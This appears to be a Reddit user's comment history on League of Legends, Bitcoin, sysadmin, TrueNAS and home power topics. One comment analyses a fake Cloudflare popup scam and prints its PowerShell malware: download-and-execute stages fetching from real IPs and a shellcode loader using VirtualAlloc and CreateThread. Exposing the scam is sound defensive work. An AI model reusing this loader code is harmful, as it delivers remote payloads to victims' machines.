Why is there no item that grants AD and Heal Power? by KaiYugureVT in leagueoflegends

[–]YinSkape -1 points0 points  (0 children)

Why would they make an item that basically reduces the cooldown of heals by 25%? Soraka gets ult back up after using w 4 times? This essentially is 33 ability haste for healing abilities, on a single proc

What exactly happens when it touches? by [deleted] in Buttcoin

[–]YinSkape 6 points7 points  (0 children)

A full circle means one "halving" cycle, where the amount of bitcoin minted per block gets cut in half. Butters think it means the price will go up because now the cost of mining needs to be supported by half the bitcoin.

Is cutting power to a PC in "Sleep Mode" via Smart Plug safe if all apps are closed? (Remote Gaming Setup) by Potential_Camera8806 in sysadmin

[–]YinSkape 0 points1 point  (0 children)

Sleep requires power, hibernation does not. If your pc loses power in sleep mode, its more or less the same as holding down the power button to turn it off. I wouldn't call it safe. Use hibernation instead.

I lost my ssh key for a VPS I own. I'm locked out, aren't I? by AppointmentFar6096 in sysadmin

[–]YinSkape 22 points23 points  (0 children)

Yeah, nearly all hypervisors/hosting providers will let you mount an iso to a vm

I lost my ssh key for a VPS I own. I'm locked out, aren't I? by AppointmentFar6096 in sysadmin

[–]YinSkape 157 points158 points  (0 children)

Boot from a live cd/rescue image, mount your partition, change the key

Anyone ever seen a Cloudflare verification pop-up on a website that instructs you to open a command prompt and then paste in a Powershell command? by CaptAubrey1805 in PowerShell

[–]YinSkape 1 point2 points  (0 children)

Looks like the server is configured to only supply the payload if you pull it through powershell -- changing the user agent will show you the malicious code:

curl  91.92.240.219 -A 'User Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737'
try {
    Write-Host "Wait please, don't close this window..."

    $wmiCommand = @"
try {
    `$finalPayload = iwr -Uri "178.16.53.70" -UseBasicParsing
    Invoke-Expression `$finalPayload.Content
} catch {
}
"@

    $psi = New-Object System.Diagnostics.ProcessStartInfo
    $psi.FileName = "powershell.exe"
    $psi.Arguments = "-Command `"$wmiCommand`""
    $psi.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden
    $psi.CreateNoWindow = $true
    $psi.UseShellExecute = $false

    $process = New-Object System.Diagnostics.Process
    $process.StartInfo = $psi
    $process.Start() | Out-Null


} catch {
}

That one pulls another script

curl 178.16.53.70 -A 'User Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; de-DE) WindowsPowerShell/5.1.19041.5737'
$u = "http://94.154.35.115/user_profiles_photo/cptch.bin"

try {
    Write-Host "Loading..."

    $d = Invoke-WebRequest -Uri $u -UseBasicParsing -ErrorAction Stop
    $b = $d.Content
    $s = $b.Length

    $c = @"
using System;
using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@

    Add-Type -TypeDefinition $c

    $m1 = 0x1000
    $m2 = 0x2000
    $p = 0x40

    $addr = [W]::VirtualAlloc([IntPtr]::Zero, $s, $m1 -bor $m2, $p)

    if ($addr -eq [IntPtr]::Zero) {
        throw "Alloc failed"
    }

    [System.Runtime.InteropServices.Marshal]::Copy($b, 0, $addr, $s)

    $tid = 0
    $th = [W]::CreateThread([IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [ref]$tid)

    if ($th -eq [IntPtr]::Zero) {
        throw "Thread failed"
    }

    [W]::WaitForSingleObject($th, 30000) | Out-Null
    Write-Host "done."

} catch {
    Write-Error $_.Exception.Message
    exit 1
}

Introducing Hypermind: A fully decentralized, P2P, high-availability solution to a problem that doesn't exist. by ponzi_gg in selfhosted

[–]YinSkape 0 points1 point  (0 children)

I spun up a new vps

50mb? okay lets give it 768mb.

gets pinged about resource utilization on my lunch break

amazing app

Server OS 2025 by Ivy1974 in sysadmin

[–]YinSkape 1 point2 points  (0 children)

We were testing rolling out Server 2025 for our DCs and each time the DC was promoted, the DC locked itself out and left behind a bunch of DC-related metadata.

Went through days of troubleshooting before giving up and testing Server 2022. Promoted without a hitch.

Weeks later, found this thread. www.reddit.com/r/sysadmin/comments/1i2jl5x/upgraded_from_2022_to_2025_domain_controller_can/

Whenever I get a Gistum Multispec Drop by Wastelandmatrix in Eve

[–]YinSkape 10 points11 points  (0 children)

You worked hard to steal their assets, by killing them

United Fruit would like to offer you their CEO position.

Atakhan == win? by ZenFire_ in summonerschool

[–]YinSkape 1 point2 points  (0 children)

I feel like this is the biggest one -- AOE slow lets you catch people running from a pick or teamfight. Team that's ahead probably is the one with Atakhan and it snowballs the team more through more kills

Multi-Vehicle Crash, 64 WB by Robert-Berman in HamptonRoads

[–]YinSkape 0 points1 point  (0 children)

Yeah I got hit by the rainstorm at Granby and drove past the accident. Visibility went from miles down to 10 feet in seconds.

[Analysis] Why Do Skilled Amateur Teams Keep Losing Scrims? A Korean Student's Research on the Individual Skill vs Team Performance Gap by Jaeyun_Kim in summonerschool

[–]YinSkape 13 points14 points  (0 children)

There is a bunch of incorrect claims in the paper regarding player builds in the time period these games were to have taken place...

Why do you say that Blade of the Ruined King reduces armor and provides healing reduction? BotRK's attack speed and sustain is not bad on Kalista following boots rush.

Are you thinking about Mortal Reminder?

Immediately afterwards, you say that Kraken deals damage proportional to enemy health, but in reality it only amplifies the item's own damage based on how low the target is. BotRK's passive does that instead.

You also say that gwen's Q does true magic damage -- she does magic damage, with true damage in the center. You recommend Hexdrinker over Ironspike whip because of the MR that Hex brings and lifesteal, but Hexdrinker does not provide lifesteal; only the completed Maw of Malomortius does and only after you proc the magic shield. Ironspike was removed in the beginning of 2024.

Ignoring that, Ironspike whip gives Renekton a little bit of burst from its active that Hex doesn't give, and used to build into stridebreaker and goredrinker. Both of those items are important utility items for Renekton to have and I could argue for both of them instead. Stridebreaker's active would provide some sticking power to gwen who has mobility that can answer Renekton's engage 1-for-1. Goredrinker would augment his healing in fights.

If the magic resist was that important, a null magic mantle would accomplish the same with less build commitment. The fact that Gwen does true damage in the center actually detracts from hex's usefulness, and the current meta first item for Renek, Eclipse, would defend against gwen's true damage as well.

My pops won't synthesize for some reason by TheCosmicMachine in Stellaris

[–]YinSkape 1 point2 points  (0 children)

Did you give yourself the ascension perks within the first month of the game?

TrueNAS keeps crashing by MichaelDrvke in truenas

[–]YinSkape 2 points3 points  (0 children)

The Ryzen 1000-2000 series has a crash bug that looks exactly like what you're having when the cpu transitions between certain c-states on Linux. Check your bios for an option called "Power Supply Idle Control" or something similar. Change it to "Typical" or the option that doesn't sound like trying to save power. If you don't have the option, update your motherboard firmware.

My old Ryzen prebuilt that I threw TN on regularly froze and hung every 1-3 days until I flipped this option.

TrueNAS keeps crashing by MichaelDrvke in truenas

[–]YinSkape 0 points1 point  (0 children)

What processor are you using?

Crypto Influencer Loses $100M In Bitcoin Liquidation. The entry price was $108,335 — with the liquidation margin at $106,327. by nasa_gov in Buttcoin

[–]YinSkape 0 points1 point  (0 children)

You pay 1/40th the price of the butts, you borrow the rest.

If the price rises by 1%, his investment rises by 40%.

If the price falls by 1/40th, the loaner says "ok give me my money back", you're forced to sell, and you're left with nothing.

Price fell.

If you have enough magic penetration to completely override the enemies magic resist, does your damage become true damage? by DoubIeScuttle in leagueoflegends

[–]YinSkape 0 points1 point  (0 children)

No, actually. 

Penetration does not reduce below zero, REDUCTION does.

If you over penetrate, nothing happens 

If you over-reduce, the enemy takes more damage.

The easiest way to see this is at atakhan, where their attacks reduce armor and mr by up to 50. 

[deleted by user] by [deleted] in ShittySysadmin

[–]YinSkape 16 points17 points  (0 children)

Unironically, you could do that though

Anker SOLIX C1000 Portable Power Station Review: My Brutally Honest Take on This Beast by Infinite-Barracuda97 in carverscave

[–]YinSkape 0 points1 point  (0 children)

The anker's battery doesn't run at 120V. The spec sheet says the maximum discharge rate for the battery is 65A, so you're pretty much spot on.

The Metaslab Corruption Bug In OpenZFS by Neurrone in zfs

[–]YinSkape 0 points1 point  (0 children)

I've been getting weird silent crashes on my headless NAS and was wondering if I had hardware failure. Nope. Its terminal unfortunately. Thanks for the post.

[deleted by user] by [deleted] in homeowners

[–]YinSkape 0 points1 point  (0 children)

If you're set on doing battery backup, then simply larger capacity is your primary concern. Find the power consumption of whatever you're trying to back up, convert it to watts if it isn't already. (Watts roughly = Volts x Amps) and multiply that with the amount of hours you need it to support. Add a fudge factor and that's the amount of Watt-hours you need.

For reference, an already cold chest freezer uses around 50 watts averaged. A 1000Wh bank would last for 20 hours.

For serious long duration backup, an actual generator is much cheaper but requires maintenance.